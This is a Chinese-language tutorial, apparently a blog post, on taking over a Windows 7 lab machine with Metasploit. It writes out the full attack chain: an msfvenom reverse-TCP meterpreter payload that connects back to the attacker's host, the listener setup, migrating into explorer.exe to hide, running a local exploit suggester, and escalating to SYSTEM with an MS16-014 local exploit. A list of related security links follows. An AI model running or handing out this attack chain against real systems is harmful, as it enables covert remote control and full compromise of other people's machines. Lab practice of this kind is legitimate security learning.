环境部署 攻击机:Kali ip:192.168.208.138
靶机:Win7(x64) ip:192.168.208.142
Payload (因为是靶机测试,可以在Kali开启apache2服务或者使用WinSCP将木马传入目标靶机,方便后面监听)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.138 LPORT=6666 -f exe > reverse.exe
开启监听
use exploit/multi/handler
设置payload
set payload windows/x64/meterpreter/reverse_tcp
设置lhost
set lhost 192.168.208.138
设置lport
set lport 6666
然后运行
exploit
在Win7靶机打开传入的木马,Kali成功上线!
文章图片
上线后进行进程迁移(隐藏自己),把进程迁移到explore.exe中,1844为进程的pid
migrate 1844
输入指令查看当前用户权限
文章图片
攻击提权 system为Win7最高权限,开始提权!
首先输入background命令将session放到后台
文章图片
然后开始执行攻击模块,探索系统存在的漏洞(未修补)
use post/multi/recon/local_exploit_suggester
文章图片
将后台的session 1 会话拿出来,执行exp
文章图片
在探测出的系统漏洞中选择攻击模块进行提权
set session 1
use exploit/windows/local/ms16_014_wmi_recv_notif
exploit
文章图片
文章图片
成功提权 【安全|利用msf实现windows的上线与提权】通过返回信息说明攻击成功,并返回shell,输入指令查看当前用户权限,发现是system,提权成功!
文章图片
推荐阅读
- 服务器|利用MSF&CS溢出漏洞提权云服务器windows server2012
- rocket|rocket mq 监听端口_微服务异步架构——MQ之RocketMQ
- web安全|[CTF的PASSBY]浅谈FLASK-jinja2 SSTI 的绕过
- web安全|【千锋】网络安全学习笔记(五)
- js|逆向日记之发票查验平台网站js逆向分析及逆向算法
- 前端|浏览器安全——Web页面安全&浏览器网络安全(HTTPS)&浏览器系统安全
- Vulnhub|vulnhub之darkhole_2
- Linux|搭建Prometheus+Grafana的云平台监控系统
- [开发杂谈记录] Windows CMD使用socket代理